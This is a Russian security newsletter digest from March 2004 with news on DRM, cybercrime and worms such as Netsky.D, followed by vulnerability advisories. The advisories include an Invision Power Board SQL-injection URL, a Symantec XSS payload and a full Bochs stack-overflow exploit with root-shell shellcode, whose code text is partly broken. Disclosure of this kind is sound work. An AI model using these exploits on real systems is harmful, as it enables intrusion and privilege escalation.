Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

29.2.2004 - 1.3.2004

Содержание


События, семинары, конференции, даты

Мнение Intel по поводу мер защиты записей на цифровых носителях

1 марта | astera

Обычно мы стараемся не пропускать ключевые сообщения на тему вопросов защиты мультимедийного контента. Как знать, чем в будущем обернется заявление представителя той или иной крупной компании? Накал страстей при обсуждении будущих защищенных стандартов традиционно высок, любое мнение может склонить чашу весов в ту или иную сторону.

Весьма интересная реплика последовала в конце нынешней недели от Крейга Барретта (Craig Barrett), CEO компании Intel, в ходе мероприятий токийского семинара Digital Home Press Seminar. Как известно, уже не первый год Intel продвигает идею "цифрового дома", этим вопросам были посвящены ключевые выступления представители компании на недавно закончившемся IDF Spring 2004; полагаю, что этой теме будет посвящен не один десяток наших новостей в ближайшее время. Пожалуй [на моей памяти], впервые столь рельефно компанией было обозначено отношение к идеям защиты цифрового контента от копирования.

Насладитесь цитатой:

"As long as the copy-once rule stays alive, it is impossible to work on the real strength of digital contents within a home environment... ...It is necessary to free digital content from any kind of copy protection rules at home".

Иными словами, худшего тормоза для развития цифрового окружения в быту и не придумать. Ход сильный и ход решительный, полагаю, некоторые владельцы всемирных звукозаписывающих лейблов при этом явно поморщились: продвижение дополнительных мер защит записей от копирования с разным успехом продвигается ими уже не первый год.

Тем не менее, мнение компании по этому вопросу в дальнейшем будет все более увесистым: бытовая цифра ныне в фаворе у Intel, спорить с ней далее будет все сложнее и сложнее. Судите сами, компания столбит за собой один за другим форпосты, ныне всецело принадлежащие традиционным поставщикам бытовой электроники: аппаратная база такой техники, аудио и видео центры (концепция HDTV тюнеров, LCOS проекторы), мобильная платформа Florence с интегрированным беспроводным доступом в интернет и IP-телефонии (Voice-over-IP), концептом настольного ПК Sandow и многим другим...

Стоит подчеркнуть, что не далее как во втором квартале нынешнего года индустриальная группа DHWG (Digital Home Working Group), вплотную занимающаяся этими вопросами, намерена представить что-то вроде базовых основополагающих документов по вопросам дальнейшего взаимодействия бытовой электроники с возможностью выхода в Сеть. Предполагается, что бумаги станут основой взаимодействия производителей ПК, бытовой техники и поставщиков развлекательного контента на ближайшие годы. К концу года не исключено появление первых устройств с учетом рекомендаций DHWG. Определенности, увы, до сих пор нет, но сами можете себе представить, насколько критичной для формирования этих стандартов может стать позиция Intel. В дальнейшем мы намерены не упускать ни одного ключевого сообщения на эту тему. Разумеется, вольницы для пиратов это не добавит, однако, похоже, вопросы защиты от копирования будут сформулированы в разумных рамках.


Регулирование: Законы, постановления, сертификация, контроль

Установлена личность взломщика приставки MSN TV

1 марта | compulenta.ru

Агенты Федерального бюро расследований (ФБР) США по обвинению в кибертерроризме арестовали сорокатрехлетнего жителя Луизианы Дэвида Джинсона.

Луизианец летом 2002 года разослал владельцам устройства MSN TV, применяющегося для доступа во Всемирную сеть с помощью телевизора, электронные сообщения с вложенными файлами, содержащими вредоносный код. В тексте письма было указано, что вложение якобы представляет собой небольшую утилиту для изменения цветовой гаммы пользовательского интерфейса. Однако, на самом деле запуск файла приводил к изменению настроек приставки MSN TV, которая вместо набора номера интернет-провайдера начинала дозваниваться до службы спасения 911. Причем соединение могло устанавливаться автоматически, когда приставка совершала ежедневный "технический" звонок в полночь.

Сообщение, содержащее вредоносный код, было отправлено восемнадцати пользователям службы MSN TV, некоторые из которых по неосторожности перенаправили письмо своим знакомым. Всего, в результате, была инфицирована 21 приставка. Причем в десяти случаях фальшивые звонки стали причиной приезда полиции. Кроме того, вирус отсылал информацию о серийном номере устройств MSN TV по адресу timmy@postmark.net, зарегистрированному на одном из бесплатных серверов, что и позволило отследить злоумышленника. Проанализировав почтовые лог-файлы, агенты безопасности установили, что одна из бета-версий червя была отправлена на собственный аккаунт MSN TV Джинсона.

В итоге, полиция конфисковала компьютеры Джинсона, а сам несостоявшийся хакер оказался на скамье подсудимых. В настоящее время, правда, злоумышленник отпущен на свободу под залог в размере 25 тысяч долларов США до следующих слушаний.

Суд похвалил хакера, взломавшего сайт "Моссада"

1 марта | securitylab.ru

Израильский подросток, обвиненный в попытке взлома сайта "Моссада", был признан невиновным Магистратским судом Иерусалима. Как сообщает Ha'aterz, судья Абрахам Тенненбойм пришел к выводу о том, что Ави Мизрахи не пытался взломать сайт, но лишь проверял уровень его защиты, а проверка защищенности любого сайта - деяние, достойное похвалы.

"Те, кто выявляют слабые места в защите сайтов, действуют в интересах общественного блага, если они совершают это с добрыми намерениями, и их действия не причиняют вреда, они должны приветствоваться" - говорится в судебном постановлении.

Дело против Мизрахи было возбуждено в июне 2003 года. Адвокат подростка Омри Кабири в оправдание своего подзащитного говорил о том, что Мизрахи послал на сайт "Моссада" свое резюме в надежде быть принятым туда на работу. Программа по выявлению степеней защиты сайта была прислана им в приложении к резюме.

Минюст начал судебный процесс против Oracle

1 марта | cnews.ru

Министерство юстиции США обратилось в суд с целью блокировать поглощение PeopleSoft компанией Oracle. Согласно аргументам юристов минюста осуществление этой сделки приведет к подрыву нормальной конкуренции между двумя ведущими производителями ПО уровня предприятия, что в свою очередь отразится на покупателях – цены вырастут, возможность выбора снизится. Минюст также отмечает, что в настоящее время только три компании - Oracle, PeopleSoft и SAP - поставляют подобные программы для больших организаций. Напомним, что в феврале чиновники минюста уже вынесли предварительное решение блокировать сделку.

Несмотря на это Oracle готов отстаивать свои интересы в суде, утверждая, что решение чиновников пролоббировано представителями PeopleSoft. По мнению управляющих Oracle, сделка выгодна не только обеим компаниям, но и рынку в целом. Министерство юстиции в свою очередь отрицает все обвинения в предвзятости и выражает готовность довести судебное разбирательство в рамках антимонопольного законодательства до конца.

Новое разбирательство на рынке DRAM: ведущих поставщиков обвиняют в сговоре

1 марта | astera

Очередной скандал рынка памяти: события, происшедшие два года назад, по-прежнему не забыты и, как сообщает источник со ссылкой на вчерашний выпуск Wall Street Journal, ведущих мировых поставщиков чипов оперативной памяти (DRAM) ожидает расследование со стороны регулирующих органов США. Напомним, что в прошлом году мы стали свидетелями другого такого расследования, предпринятого по инициативе Micron в отношении южнокорейской Hynix в связи с получением субсидий со стороны государства. Результатом стало введение пошлин на импорт продукции Hynix в США и европейские страны. Однако в этот раз Micron сама попала под подозрение: четверка ведущих поставщиков DRAM, куда входят Samsung, Hynix, Micron и Infineon, обвиняется в сговоре, в результате которого два года назад наблюдался резкий рост цен на чипы. Не застрахованы от обвинений в участии в этом сговоре и остальные компании, представленные на рынке.

Информацию о том, что компанию посетили следователи, уже подтвердили в Hynix агентству Reuters, а в Infineon — Dow Jones. Как утверждается в Wall Street Journal, Micron уже заявила о добровольном и активном сотрудничестве с сотрудниками Министерства Юстиции США, не подтвердив, что также обвиняется в сговоре с целью установления цен. Хотя, возможно, компания рассчитывает на то, что ее и не тронут, не зря же в прошлом году в СМИ просочились сведения о возможном признании Micron участия в незаконной картели.

Что ж, утихшие было слухи о том, что производители памяти когда-то пошли на сговор, как оказалось, совсем не забыты и теперь их проверкой будут заниматься правоохранительные органы. Даже если сговор когда-то и имел место, нельзя отрицать тот факт, что производители памяти уже наказаны длительным периодом низких цен и убыточности бизнеса. Как говорится, рынок не проведешь…


Проблемные ситуации, информационная преступность, сетевые войны

Эксперты ожидают увеличение проявлений киберпреступности

1 марта | http://www.crime-research.ru/

Анализ различных источников позволяет прогнозировать значительное увеличение в будущем различных проявлений киберпреступности. За последние 12 месяцев 82% американских компаний, опрошенных Институтом компьютерной безопасности (Computer Security Institute), сталкивались с проблемой компьютерных вирусов, а нанесенный им ущерб оценивается в $27,3 млн.

Следует также обратить внимание на преступления с электронными пластиковыми карточками. По экспертным оценкам, на международном уровне этот вид трансграничных преступлений причиняет ущерб банковской системе в размере до 10% объемов операций с карточными счетами. Так, в международной системе электронных платежей Mastercard зарегистрировано мошенничеств с карточками на сумму 703 млн.долл. США, VISA из-за мошенничеств с кредитными и дебиторскими карточками понесла ущерб в размере 1,2 млрд.долл. США.

У сотрудников 59% компаний преступники похищали лэптопы, в которых содержалась ценная информация (ущерб составил $6,8 млн.). У 42% компьютерные сети давали сбои (потери превысили $65,4 млн.). У 21% фирм из электронных баз данных была похищена ценная информация (ущерб - почти $71,2 млн.), а 15% компаний стали жертвами финансового мошенничества ($10,1 млн.).

Наиболее вероятный способ проникновения вредоносных программ - сеть Интернет и электронная почта. Здесь мы в огромной степени зависим от провайдера: состояния его антивирусной защиты и защиты от несанкционированного доступа. Исследовательская организация Radicati Group предсказывает, что ущерб только от вирусов к 2006 году вырастет до 75 млрд. долларов. Сегодня попытки государственного регулирования в Интернет сводятся, как правило, только к регистрации доменных имен, хотя эта проблема является не самой главной. Гораздо более важно защитить информацию в Интернет от недобросовестных пользователей. Масштабы распространения информационного взаимодействия через Интернет связаны с деятельностью миллионов предприятий и частных лиц, и защита их интересов является задачей национального масштаба.

В связи с ростом киберугроз эксперты ожидают значительный рост рынка информационной безопасности. Многие мировые компании уже заявили о том, что безопасность в IТ-секторе становится приоритетом, в том числе и в финансовом плане. Среди наиболее покупаемых технологий лидируют антиспамрешения (60%), антивирусные решения (51%) и системы обнаружения вторжения (40%); напротив, менее массовыми продуктами оказались системы аутентификации (29%) и консалтинговые услуги (11%). Недавно исследовательская компания IDC в очередной раз выпустила прогноз по рынку IТ-безопасности. В 2004-2007 г.г. затраты американских фирм на обеспечение безопасности своих компьютерных баз данных вырастут на 15-18%. На 16% увеличатся затраты на оборудование и программное обеспечение, которое позволяет выявить факт незаконного проникновения в корпоративные компьютерные сети. Доходы от продажи продуктов и услуг всех секторов достигнут к 2006 году 45 млрд. долларов.

Уровень компьютерного пиратства в Украине уменьшается

1 марта | http://www.crime-research.ru/

Сегодня на рынке программного обеспечения существует стойкая тенденция к уменьшению уровня пиратства.

К такому выводу пришли участники экспертного обсуждения сценариев развития рынка ПО в Украине, проведенного компанией GfK-USM в рамках выполнения исследования рынка ПО по заказу Коалиции по вопросам защиты прав интеллектуальной собственности (CIPR).

Участие в обсуждении приняли представители компаний, которые работают на рынке ПО, и органов государственной власти.

Участники обсуждения согласились, что для существенного снижения уровня нелегального использования ПО важно усилить борьбу с ним на уровне массовых пользователей - больших предприятий и учреждений.

В свою очередь, как отметила в сообщении пресс-служба Государственного департамента интеллектуальной собственности, “последние шаги украинского правительства относительно легализации программного обеспечения и рост отечественной экономики в течение четырех лет подряд создали благоприятные условия для развития рынка программного обеспечения”.


Технологии безопасности. Организации разработчики, интеграторы.

Microsoft вовлекает разработчиков в процесс повышения безопасности ПО

1 марта | securitylab.ru

Компания планирует выпуск сервисных пакетов к своим инструментам разработки Visual Studio.Net 2003, а также к .Net Framework — структуре runtime, необходимой для исполнения приложений веб-сервисов под Windows. Обновления, направленные на то, чтобы облегчить разработчикам использование новейших средств безопасности, должны выйти примерно в середине года, когда Microsoft планирует выпустить Windows XP Service Pack 2. «Мы хотим максимально приблизить даты выпуска Windows XP Service Pack 2 и инструментальных сервисных пакетов друг к другу. В идеале они должны выйти вместе», — сказал продакт-менеджер Тони Гудхью.

Инструментальные сервисные пакеты помогут разработчикам определить, нужно ли вносить изменения в существующие приложения, чтобы они работали с обновленной Windows ХР. Кроме того, они нацелены на поощрение применения разработчиками новых функций защиты. Вместе с обновленными инструментами Microsoft предложит бесплатные курсы и документацию на своем веб-сайте для разработчиков, где описываются следствия тех изменений, которые будут внесены пакетом обновлений Windows XP Service Pack 2. Это первый случай, когда компания предлагает бесплатное обучение по сервисному пакету.

На прошлой неделе Билл Гейтс перечислил целый ряд изменений, которые войдут в Windows XP Service Pack 2 и сделают безопаснее работу таких приложений, как Internet Explorer и Outlook. Компания усилила свой брандмауэр и внесла изменения в механизм взаимодействия Windows с памятью во избежание «переполнений буфера».

Гудхью говорит, что выпуск сервисных пакетов для Visual Studio.Net и .Net Framework важен для повышения безопасности всех настольных приложений для Windows, а не только для тех, которые создает Microsoft. «Мы понимаем, что безопасность — беда разработчиков. Не только наших, а по всей отрасли. Мы хотим быть добропорядочными гражданами, чтобы наше ПО было более безопасным и помогало нашим заказчикам — разработчикам — писать безопасные приложения», — сказал он.

Когда операционная система, браузер и email станут лучше защищены, хакерам придется переключиться на другие приложения, считает Гудхью. Например, червь Slammer, вызвавший эпидемию в прошлом году, использовал уязвимость в СУБД Microsoft SQL Server, отметил он.

RSA представила технологию блокирования RFID-меток

1 марта | cnews.ru

Компания RSA Security на своей конференции по безопасности данных продемонстрировала прототип устройства на основе технологии блокирования RFID-меток.

Не нанося какого-либо вреда возможностям радиометок, блокирующая метка, оформленная также как и сама радиометка, разработана для предотвращения нежелательного сканирования и отслеживания людей или имущества. По утверждению RSA, технология блокирования необходима для предотвращения незаконного доступа кого бы то ни было к важной информации.

Технология блокирования основана на принципе ложного ответа RFID-ридеру, которым пытаются просканировать радиометки не имея на то прав, тем самым нарушая его нормальную работу. В компании добавили, что, удалив блокирующую метку с продукта, нормальная работа RFID-метки будет восстановлена, но если радиометка оказывается в зоне действия блокирующей метки, информация, содержащаяся в RFID-метке защищена от считывания.

Аналитик компании Gartner Джеф Вудс (Jeff Woods) заявил, что существуют некоторые опасения по поводу законности на рынке с использованием технологии RFID. Первое, что ответили на эти опасения продавцы, это заявление об уничтожении или нарушении функционирования радиометки сразу после продажи товара. Однако, по словам Вудса, несмотря на то, что выведение из строя радиометок и избавляет от опасений по поводу безопасности частной жизни, оно так же сведёт на нет всю клиентскую и постпродажную пользу организаций, к которой они стремятся используя радиометки.

Процессоры AMD получили встроенные средства защиты

1 марта | astera

Американская корпорация Advanced Micro Devices объявила о том, что процессоры Athlon 64 и Opteron отныне будут иметь встроенные функции защиты от некоторых типов компьютерных вирусов. Речь идет исключительно о тех вредоносных программах, которые для проникновения на уязвимую машину используют ошибку переполнения буфера.

При этом, однако, работать новая технология защиты будет только лишь в том случае, если на компьютере установлена операционная система Microsoft Windows ХР со вторым пакетом обновлений. Дело в том, что в состав второго сервис-пака для вышеназванной ОС будет включен так называемый модуль Data Execution Prevention, предотвращающий возможность использования ошибки переполнения буфера. Согласно заявлениям представителей софтверного гиганта, около половины всех патчей, выпущенных за последние два года, были бы не нужны, если бы новая технология защиты была предложена раньше.

Следует напомнить, что второй пакет обновлений для ОС Windows ХР должен быть выпущен ближе к середине нынешнего года. Причем сервис-пак, помимо компонента Data Execution Prevention, будет содержать и ряд других программных модулей, призванных повысить безопасность при работе во Всемирной cети. В частности, в его состав войдет система Windows Security Center, выводящая на экран предупреждение в том случае, если на ПК отсутствует антивирусный пакет, или если пользователю пора обновить вирусные базы данных.


Информационая безопасность государственной власти

Завершена разработка проекта закона «Об интернете»

1 марта | securitylab.ru

Этот законопроект разрабатывался различными ведомствами и уже прошел согласование с профильными комитетами Государственной Думы (ГД). К работе над проектом закона были привлечены также специалисты Министерства иностранных дел РФ. Они «постарались реализовать» в этом документе соответствующие рекомендации международных организаций, таких как ОНН и ЮНЕСКО, сообщает http://it-daily.ru

Утверждается, что эти организации в настоящее время обеспокоены бесконтрольным развитием Сети и планируют создать ряд международных норм и положений о регулировании деятельности в интернете. Так, летом текущего года в Японии должно пройти международное совещание по вопросам интернета. К тому времени должны быть определены сроки проведения всемирного совещания по данному вопросу. Это совещание предполагается провести в Тунисе.

В том случае, если международные организации разработают и примут положения о регулировании деятельности в Сети, Россия тоже должна будет им следовать, поскольку является членом этих организаций. Поэтому в подготовленном законопроекте реализованы «международные рекомендации».

По информации IT-daily.ru, с принятием закона в России будет значительно усилен контроль за деятельностью в интернете. Причем, не только интернет-провайдеров, но и пользователей. Речь идет даже о необходимости получения лицензии или разрешения при организации постоянного подключения к интернету.

Сегодня пока неизвестно, будет ли Госдума нового созыва рассматривать этот законопроект до летних каникул или отнесет его на потом.

"Центризбирком" готовит компьютеры к президентским выборам

1 марта | astera

Центральная избирательная комиссия России начала подготовку своих компьютерных систем к намеченным на 14 марта президентским выборам. Как сообщает РИА "Новости", в пятницу прошла тренировка персонала, обслуживающего электронную систему ГАС "Выборы". По словам руководителя Федерального центра информатизации при ЦИК России Виктора Ященко, в тренировке приняли участие около 15000 человек.

"Главная цель тренировки - оценить подготовку системных администраторов, готовность технических средств к выборам, а также отработать взаимодействие с подразделениями министерства связи", - заявил Ященко. Он отметил, что в тренировке принимают участие руководители избирательных комиссий всех уровней, а также 3000 системных администраторов, отвечающих за эксплуатацию ГАС "Выборы" в регионах России. Тренировка проходила в пятницу с 0:00 до 18:00 по московскому времени.

Одновременно в "Центризбиркоме" началась реализация комплекса мер, нацеленных на противодействие хакерским атакам на сайт ЦИК. По словам Ященко, во время проведения выборов депутатов Госдумы 7 декабря прошлого года было зафиксировано свыше 900 атак хакеров на сайт "Центризбиркома". "Мы проанализировали эти попытки взломать сайт и усиливаем средства его защиты", - отметил Ященко. Самой системе ГАС "Выборы" хакерские атаки не грозят, так как она не имеет связи с интернетом.


Информационая безопасность общественной коммуникации, личности.

«Netsky. D»: новый охотник на «Mydoom» бороздит пространство интернета

1 марта | kaspersky

«Лаборатория Касперского» предупреждает об обнаружении новой вирусной эпидемии, вызванной четвертой модификацией сетевого червя «Netsky» — «Netsky.D» (также известен как «Moodown.D»). На данный момент уже получено несколько десятков сообщений о случаях заражения компьютеров. В этой связи «Лаборатория Касперского» рекомендует пользователям срочно обновить антивирусные программы и ознакомиться с более подробной информацией о данной вредоносной программе.

«Netsky.D» распространяется через письма электронной почты. Зараженные сообщения могут иметь самый разный внешний вид: червь случайным образом выбирает заголовок из 25 вариантов, текст письма (6 вариантов), имя вложенного файла (21 вариант).

Вложенный файл имеет фиктивное расширение .PIF, в действительности представляя собой обычную EXE-программу (размер около 17Кб). Если пользователь имел неосторожность запустить этот файл, то червь устанавливает себя в систему и запускает процедуры распространения.

При установке «Netsky.D» копирует себя с именем WINLOGON.EXE в каталог Windows и регистрирует этот файл в ключе авто-запуска системного реестра. Таким образом он обеспечивает свою активизацию при каждой загрузке операционной системы.

Для дальнейшей рассылки червь сканирует файлы наиболее распространенных интернет-приложений (например, WAB, EML, DOC, HTML, MSG и др.), считывает из них адреса электронной почты и незаметно для владельца компьютера отсылает на них свои копии. Важно отметить, что рассылка писем осуществляется в обход установленного на компьютере почтового клиента, но с использованием встроенной SMTP-подпрограммы. С ее помощью «Netsky.D» распространяется через 23 прокси-сервера, расположенных в разных концах мира.

Червь имеет ряд побочных действий. В частности, он удаляет из системного реестра ключи другого сетевого червя — «Mydoom», а также пытается нарушить работу Антивируса Касперского®.

Процедуры защиты от «Netsky.D» уже добавлены в базу данных Антивируса Касперского®.

Более подробная информация о данной вредоносной программе доступна в Вирусной Энциклопедии Касперского (http://www.viruslist.com/viruslist.html?id=144717728).

Новая афера в Интернете

1 марта | http://www.crime-research.ru/

Будьте бдительны, когда получаете электронную почту от легальных Интернет-компаний с просьбой предоставить персональную и финансовую информацию.

Никогда не выдавайте номера кредитных карт, номер социального страхования, дату рождения, номера счетов, телефонные номера, адрес и даже свое имя, отвечая на e-mail, предварительно не позвонив и не убедившись в легальности происхождения этого письма.

Каждый день мошенники «спамят» тысячи пользователей, в надежде, что кто-то, да и «попадется» на их трюк.

Новая схема мошенничества удачно сработала в конце прошлой недели. Выглядит она следующим образом: потенциальная жертва получает e-mail, в котором сообщается о том, что он только что купил ноутбук за 3 тыс. долларов. Однако сделка не может быть завершена по причине того, что у продавца возникли проблемы с компанией, осуществляющей доставку товара. Поэтому пользователя просят отозвать якобы сделанный им платеж через другой web-сайт.

Этот web-сайт выглядит как страница вполне легальной и достаточно известной компании Jettis, которая предоставляет услуги по проведению расчетов в Интернете. Чтобы получить свои деньги обратно, жертву просят ввести свое имя и информацию по кредитной карте.

Адвокат компании Jettis официально заявил, что в настоящее время компания тесно сотрудничает с властями, чтобы установить источник рассылки и мошенников. Специалисты компании утверждают, что «фальшивый» сайт был создан где-то в Восточной Европе.

За последние несколько лет, спуффинг (spoofing) стал одним из самых популярных способов Интернет-мошенничества, рассчитанных на получение конфиденциальной информации пользователей.

Прежде чем предоставить свои данные, специалисты советуют пользователям обратить внимание на следующие моменты:

- в е-mail ссылаются на несуществующий заказ или другую информацию неизвестную пользователю;
- грамматические ошибки в тексте письма;
- компания принимает для оплаты только номера счетов и кредитных карт;
- отсутствие полной информации о реквизитах или имени владельца компании;
- логотипы на сайте не ссылаются на главную страницу компании (например: логотип компании Jettis на фальшивой странице не был ссылкой на главную страницу web-сайта компании).

Microsoft внес изменения в свою политику лицензирования

1 марта | cnews.ru

Microsoft включил новые возможности в свою вызывающую массу споров лицензионную схему Software Assurance, пытаясь противостоять своим критикам. Среди этих возможностей – более широкий диапазон ваучеров на обучение.

Ранее компания Gartner отмечала, что минимум 50% клиентов Microsoft с лицензиями Select и Open Licensing 6.0 не собираются продлевать свои договоры. Как результат к 2008 году компания Microsoft должна потерять не менее 10% рынка ПО для десктопов. Однако в самом Microsoft надеются, что нововведения заставят пересмотреть их клиентов соглашения Software Assurance. По мнению представителей Microsoft, это показывает ответственность компании перед своими клиентами и готовность приспосабливаться к их нуждам. Microsoft рассчитывает улучшить свой имидж благодаря изменениям в лицензионной политике.


Дыры и патчи программ и операционных сред

SQL инъекция в Invision Power Board

1 марта | securitylab.ru

Программа: Invision Power Board все версии

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Invision Board Forum в "sources/search.php". Удаленный пользователь может выполнить произвольный SQL код на основной базе данных.

Уязвимый код:

    if (isset($ibforums->input['st']) )
    {
    $this->first = $ibforums->input['st'];
    }

Пример/Эксплоит:

http://www.board.com/forum/index.php?act=Search&nav=lv&CODE=show&
searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/* 

URL производителя: http://www.invisionboard.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный отказ в обслуживании против Alcatel OmniSwitch

1 марта | securitylab.ru

Программа: Alcatel OmniSwitch 7700, 7800, 8800; AOS 5.1.4.27.R03

Опасность: Средняя

Наличие эксплоита: Да

Описание: Отказ в обслуживании обнаружен в Alcatel OmniSwitch 7000 серии устройств. Удаленный пользователь может перезагрузить устройство.

Удаленный пользователь может просканировать коммутатор сканером Nessus, чтобы перезагрузить устройство. Уязвимы 80, 260, 261 и 443 порты.

URL производителя: http://www.ind.alcatel.com/specs/index.cfm?cnt=omniswitch_7000_spec

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Локальное повышение привилегий в mtools в программе mformat

1 марта | securitylab.ru

Программа: Mtools 3.9.9

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в mtools в программе mformat. Локальный пользователь может получить root привилегии на уязвимой системе.

Когда программа mformat установлена с set user id (setuid) root user привилегиями, локальный пользователь может использовать mformat чтобы создать любой файл с 0666 разрешениями.

Также, что приложение не сбрасывает привилегии при чтении локальных файлов конфигурации, так что локальный пользователь может просматривать произвольные файлы на системе.

Приложение установлено с setuid привилегиями на большинстве платнормах.

URL производителя: http://mtools.linux.lu/

Решение:Удалите setuid бит с уязвимого приложения.

DoS против PerfectNav search plug-in

1 марта | securitylab.ru

Программа: PerfectNav

Опасность: Низкая

Наличие эксплоита: Да

Описание: Отказ в обслуживании обнаружено в PerfectNav search plug-in. Удаленный пользователь может аварийно завершить работу браузера Internet Explorer целевого пользователя.

Удаленный пользователь может сконструировать некорректный URL (любого вида) , который, когда будет загружен в браузере целевого пользователя, аварийно завершить работу Microsoft Internet Explorer.

URL производителя: http://search.perfectnav.com/index.cfm?source=perfectnav&action=about

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Поднятие локальных привилегий в Bochs

1 марта | securitylab.ru

Программа: Bochs до версии 2.1.1

Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Bochs эмуляторе в обработке HOME переменной окружения. Локальный пользователь может получить поднятые привилегии на целевой системе.

Локальный пользователь может установить специально обработанное значение для HOME переменной окружения, чтобы заставить Bochs выполнить произвольные команды с привилегиями Bochs процесса.

Пример/Эксплоит:

/*
 
* The overflow happens when program does not find these files:
* .bochsrc, bochsrc, bochsrc.txt
 
* Exploit created: 28/12/2003
 
* Tested Vulnerable Versions: bochs- 2.0.1, 2.0.2, 2.1.pre1, 2.1.pre2 y 
2.1
 
* NOTA: Si el programa no esta +s no nos aparecera ninguna shell pq falla
* la funcion setuid(0), si kereis podeis comentar esa parte de la 
shellcode
* para hacer pruebas y funcionara perfectamente.
 
* debian 3.0 gcc 2.95.4 kernel 2.4.24 offset: 1270
* debian 3.0 gcc 2.95.4 kernel 2.2.20 offset: 1000
* slack 8.1 gcc 2.95.3 kernel 2.6.0 offset: 1970
 
* Contact: sesox (at) govannom (dot) org
* WebSite: http://www.govannom.org
*/

#include < stdio.h>
#include < unistd.h>
#include < getopt.h>

static char shellcode[]=
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0)
// "\x31\xc0\xb0\x2e\xcd\x80" //setgid(0)
        "\x31\xc9\x31\xd2\x51\x68\x6e\x2f"
        "\x73\x68\x68\x2f\x2f\x62\x69\x89"
        "\xe3\x51\x53\x89\xe1\xb0\x0b\xcd"
        "\x80\x31\xc0\xb0\x01\xcd\x80";

char *get_sp() {
   asm("movl %esp,%eax");
 

#define BSIZE 512 // Tama?o de la variable que vamos a desbordar
#define NOP 0x90

main(int argc, char *argv[]){

int opt,offset;
char buffer[BSIZE+8]; //Tama?o desde el principio de la variable asta la 
return address
char *ret,*path;

// Inicializamos valores por defecto (slackware 8.1)
offset = 1970;
path = "/usr/local/bin/bochs";

// Recogemos parametros del programa
while((opt = getopt(argc,argv,"p:o:h:")) != -1) {

switch(opt) {

case 'o':
offset=atoi(optarg);
break;

case 'p':
path=optarg;
break;

default:
ussage(argv[0]);
break;
 
 

// Obtenemos la direccion de retorno
ret = get_sp()+offset;

printf("Stack init: %x\n", get_sp());
printf("ret: %x\n", ret);

memset(buffer,NOP,sizeof(buffer));
memcpy(buffer+(BSIZE-strlen(shellcode)), (char *)&shellcode, 
strlen(shellcode));
memcpy(buffer+(sizeof(buffer)-4), (char *)&ret, 4);

  if(setenv("HOME", buffer, 1)==-1){
        printf("\n\tError: Can not put buffer in HOME variable.\n\n");
        exit(0);
  }

  if(execl(path,path,NULL)==-1){
        printf("\nError: Can not execute bochs. Verify if the path is 
correct.\n\n");
        exit(0);
  }
 

int ussage(char *arg) {
printf("\n\t .: Stack overflow exploit for bochs (by SeSoX) :. \n");
 printf("\n\tUssage:\n\t %s -p < path> -o < offset>\n\n",arg);
 exit(-1);
 

URL производителя: http://bochs.sourceforge.net/

Решение:Установите обновленную версию программы: http://bochs.sourceforge.net/getcurrent.html

Удаленное переполнение буфера в Libxml2

1 марта | securitylab.ru

Программа: Libxml2 до версии 2.6.6

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Переполнение буфера обнаружено в Libxml2. Удаленный пользователь может выполнить произвольный код на приложении, которое использует Libxml2.

Переполнение в libxml2 обнаружено при обработке удаленных ресурсов через HTTP или FTP. Удаленный атакующий может представить чрезмерно длинный URL, чтобы эксплуатировать обнаруженную уязвимость.

URL производителя: http://www.xmlsoft.org/index.html

Решение:Установите обновленную версию программы: http://www.xmlsoft.org/downloads.html

Удаленный отказ в обслуживании против FreeChat

1 марта | securitylab.ru

Программа: FreeChat 1.1.1a

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в FreeChat. Удаленный пользователь может аварийно завершить работу сервера.

Удаленный пользователь может послать специально обработанную строку, чтобы аварийно завершить работу целевого chat сервера.

Пример/Эксплоит:

"aaaaa"

URL производителя: http://sourceforge.net/projects/vbfreechat/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное переполнение буфера в ISS Proventia, ISS BlackICE и ISS RealSecure

1 марта | securitylab.ru

Программа: ISS Proventia A Series XPU 20.15 - 22.9; Proventia G Series XPU 22.3 - 22.9; Proventia M Series XPU 1.3 - 1.7
ISS BlackICE PC Protection 3.6 cbr through ccb; BlackICE Server Protection 3.6 cbr - ccb
ISS RealSecure Network 7.0, XPU 20.15 - 22.9; Server Sensor 7.0 XPU 20.16 - 22.9; Desktop 7.0 eba - ebh; Desktop, Guard, и Sentry 3.6 ebr - ecb

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в нескольких продуктах от ISS в обработке Server Message Block (SMB) пакетов. Удаленный пользователь может выполнить произвольный код на целевой системе.

Уязвимость обнаружена в ISS Protocol Analysis Module (PAM) компоненте, которую используют несколько программ от ISS. Переполнение обнаружено при обработке пакета "SMB Session Setup AndX request" с параметром AccountName, размером более 300 байт.

Удаленный пользователь может представить специально обработанный SMB пакет, чтобы заставить целевую систему выполнить произвольный код при попытке обработать этот пакет.

URL производителя: http://www.iss.net/

Решение:Установите обновленные версии уязвимых программ: http://www.iss.net/download

Межсайтовый скриптинг в Symantec Gateway Security

1 марта | securitylab.ru

Программа: Symantec Gateway Security 2.0

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Symantec Gateway Security. Удаленный пользователь может выполнить XSS нападение, чтобы внедриться в административную сессию.

Пример:

https://FirewallHostname:2456/sgmi/<script>badscript</script> 
Уязвимость позволяет удаленному пользователю получить JSESSIONID, хранящееся в куки, и использовать это значение чтобы внедриться в административную сессию.

URL производителя: http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_2_5400/files.html

Решение:Установите hotfix ID SG8000-20040130-00: http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_2_5400/files.html

Удаленное переполнение буфера в Serv-U FTP Server

1 марта | securitylab.ru

Программа: Serv-U FTP Server до версии 5.0.0.4

Опасность: Высокая

Наличие эксплоита: Да

